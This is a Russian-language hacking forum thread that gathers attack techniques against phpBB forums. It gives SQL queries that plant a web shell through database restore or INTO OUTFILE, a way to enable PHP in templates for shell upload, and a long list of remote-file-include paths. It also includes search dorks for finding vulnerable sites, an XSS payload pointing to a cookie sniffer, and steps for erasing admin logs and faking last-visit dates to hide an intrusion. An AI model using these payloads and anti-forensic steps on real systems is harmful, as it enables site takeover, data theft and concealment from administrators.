![]() |
Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit
|
iframe на форум
Поставить iframe на форум при наличии админки можно вписав код фрейма в название любой темы, желательно видимой для гостей. При небольшой доработке можно и в название раздела, но без знания дела экспериментировать не советую. Тестировалось на phpBB 2.0.22
Админка -> Форум -> Управление -> Названия тем -> дописываем в конце названия темы фрейм |
phpBB Topic AutoSender
Код:
--------------------------------------------------------------- |
Залив шела в cache в phpBB
Обнаружил интересную фишку, которая может помочь при заливке шелла. Иногда бывает что админ выставляет права, которые не позволяют заливать картинки в папку images/avatars попробуем это обойти.
Всем известен способ заливки шелла от Шанкара через востановление базы данных из админки. Напомню создаем файл с содержанием Код:
UPDATE phpbb_config SET config_value=concat('images/avatars/cmd.php',char(0)) WHERE config_name='avatar_path';Если папка недоступна на запись попробуем такой финт: В phpBB есть папка cache доступная на запись необходимая форуму для работы. В ней лежит .htaccess запрещающий доступ извне. Делаем файлик: Код:
UPDATE phpbb_config SET config_value=concat('cache/.htaccess',char(0)) WHERE config_name='avatar_path';Он разумеется не зальется но .htaccess из папки cache магическим способом исчезает. А дальше смотри пункт 1 :). |
PHP 3 login backdoor
/////
Код:
#!/usr/bin/pythonXSS : " target="_blank">www.ut' http://antichat.ru/sniff/log.php phpBB <= 2.0.19 Exploit: http://www.milw0rm.com/exploits/1661 http://www.milw0rm.com/exploits/1661 phpBB <= 2.0.20 Exploit: http://www.milw0rm.com/exploits/1780 phpBB <= 2.0.21 Exploit: http://www.milw0rm.com/exploits/2348 Моды TopList Hack for PHPBB <= 1.3.8 Код:
/toplist.php?f=toplist_top10&phpbb_root_path=shellКод:
/admin/addentry.php?phpbb_root_path=shellKnowledge Base Mod Код:
/includes/kb_constants.php?module_root_path=shellКод:
/auction/auction_common.php?phpbb_root_path=shellКод:
/[phpraidpath]/auth/auth.php?phpbb_root_path=shellКод:
/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shellКод:
/[phpraidpath]/auth/auth.php?smf_root_path=shellКод:
/[phpraidpath]/auth/auth_SMF/smf_root_path=shellКод:
/[pdbpath]/includes/pafiledb_constants.php?module_root_path=shellКод:
/index.php?phpbb_root_path=shellКод:
/song.php?phpbb_root_path=shellКод:
/faq.php?phpbb_root_path=shellКод:
/list.php?phpbb_root_path=shellКод:
/gen_m3u.php?phpbb_root_path=shellКод:
/playlist.php?phpbb_root_path=shellКод:
/language/lang_english/lang_activity.php?phpbb_root_path=shellКод:
/blend_data/blend_common.php?phpbb_root_path=shellКод:
/stat_modules/users_age/module.php?phpbb_root_path=shellMinerva <= v238 Код:
/admin/admin_topic_action_logging.php?setmodules=attach&p hpbb_root_path=shellКод:
/phpbb/getmsg.php?phpbb_root_path=shellКод:
/includes/functions_cms.php?phpbb_root_path=shellКод:
/m2f/m2f_forum.php?m2f_root_path=shellКод:
/m2f/m2f_phpbb204.php?m2f_root_path=shellКод:
/m2f/m2f_forum.php?m2f_root_path=shellКод:
/m2f/m2f_mailinglist.php?m2f_root_path=shellКод:
/m2f/m2f_cron.php?m2f_root_path=shellКод:
/[roster_path]/lib/phpbb.php?subdir=shellКод:
/includes/functions_mod_user.php?phpbb_root_path=shellКод:
/includes/functions.php?phpbb_root_path=shellКод:
/includes/functions_portal.php?phpbb_root_path=shellКод:
/includes/functions_kb.php?phpbb_root_path=shellКод:
/includes/bbcb_mg.php?phpbb_root_path=shellКод:
/includes/functions.php?phpbb_root_path=shellКод:
/includes/functions_admin.php?phpbb_root_path=shellКод:
/admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=Код:
/includes/functions_static_topics.php?phpbb_root_path=shellSecurity Suite IP Logger Код:
/includes/logger_engine.php?phpbb_root_path=shellКод:
/includes/themen_portal_mitte.php?phpbb_root_path=shellКод:
/includes/logger_engine.php?phpbb_root_path=shellКод:
/includes/functions.php?phpbb_root_path=shellКод:
/includes/functions_user_viewed_posts.php?phpbb_root_path=shellКод:
/includes/functions_num_image.php?phpbb_root_path=shellКод:
/includes/functions_mod_user.php?phpbb_root_path=shellphpBB Import Tools Mod <= 0.1.4 Код:
/includes/functions_mod_user.php?phpbb_root_path=shellКод:
/shoutbox.php?phpbb_root_path=shellSpamBlockerMOD <= 1.0.2 Код:
/root/includes/antispam.php?phpbb_root_path=shellКод:
/mods/iai/includes/constants.php?phpbb_root_path=shellКод:
/zufallscodepart.php?phpbb_root_path=shellКод:
/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=shellКод:
/lat2cyr.php?phpbb_root_path=shellSpamOborona PHPBB Plugin Код:
/admin/admin_spam.php?phpbb_root_path=shellКод:
/functions_rpg_events.php?phpbb_root_path=shellКод:
/includes/archive/archive_topic.php?phpbb_root_path=shellКод:
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=shellКод:
/includes/functions_mod_user.php?phpbb_root_path=shellphpBB Security <= 1.0.1 Код:
/phpbb_security.php?phpbb_root_path=shellКод:
/language/lang_english/lang_prillian_faq.php?phpbb_root_path=shellFully Modded phpBB 2 Код:
/faq.php?foing_root_path=shellКод:
/index.php?foing_root_path=shellКод:
/list.php?foing_root_path=shellКод:
/login.php?foing_root_path=shellКод:
/playlist.php?foing_root_path=shellКод:
/song.php?foing_root_path=shellКод:
/view_artist.php?foing_root_path=shellКод:
/view_song.php?foing_root_path=shellКод:
/login.php?foing_root_path=shellКод:
/playlist.php?foing_root_path=shellКод:
/song.php?foing_root_path=shellКод:
/flash/set_na.php?foing_root_path=shellКод:
/flash/initialise.php?foing_root_path=shellКод:
/flash/get_song.php?foing_root_path=shellКод:
/includes/common.php?foing_root_path=shellКод:
/admin/nav.php?foing_root_path=shellКод:
/admin/main.php?foing_root_path=shellКод:
/admin/list_artists.php?foing_root_path=shellКод:
/admin/index.php?foing_root_path=shellКод:
/admin/genres.php?foing_root_path=shellКод:
/admin/edit_artist.php?foing_root_path=shellКод:
/admin/edit_album.php?foing_root_path=shellКод:
/admin/config.php?foing_root_path=shellКод:
/admin/admin_status.php?foing_root_path=shellDORK'S Код:
Powered by phpBB 2Код:
+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.plКод:
"Powered by phpBB" "2001, 2005 phpBB Group" inurl:index.php inurl:sid=Код:
"Powered by phpbb modified v1.8 by Przemo"(c)Взято с h4ckyou.org |
небольшое дополнение способ загрузки файла через Sql
Многим известен способ заливки шелла через восстановление бд(sql запрос) . Цитата:
1) Иметь file_priv=y 2)Знать пути 3)Знать таблицу(скорее префикс) 3-ий пункт незачем, знать таблицу(префикс) не обязательно Также создаем Sql файл один вариант Код:
SELECT '<? system(id); ?>' INTO OUTFILE '/home/lol/htdocs/forum/evil.php';другой вариант Код:
select '<? system(id); ?>' into outfile '/home/lol/htdocs/forum/evil.php' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '';Тож канает |
Заливка шелла в phpBB 3
не нашел на форуме способов заливки шелла в phpBB 3 версии.
1) Вкладка общие --> Безопасность Разрешить php в шаблонах: Да 2)Вкладка Стили --> Компоненты стилей ->> Шаблоны С помощью встроенного редактора шаблонов выбираем файл и пишем в него: Код:
<!-- PHP --> |
удаление лога администратора
Цитата:
после таких манипуляций в админке phpbb3 отсается палево - айпишний и логин админа, который "тыкал кнопочки".. даже после ручного удаления изменений, все равно последнее выглядит "admin ... Очищен лог администратора ... date ... ip" через sql тулзу удаляем свои следы в таблице phpbb_log + после логаута не забываем проапдейтить дату последнего визита на прежнюю. значение находится в табле phpbb_users, колонка user_lastvisit. |
Подскажите, как залить шелл на 2.0.19 с отключенной возможностью рестора БД?
Пробовал сэксплойты от Шанкара, редактирования стиля/подписи/highlight - не работает... |
Цитата:
Попробуй обраиться к срипту напрямую Код:
admin_db_utilities.php?perform=restore&sid=сессия |
| Время: 10:31 |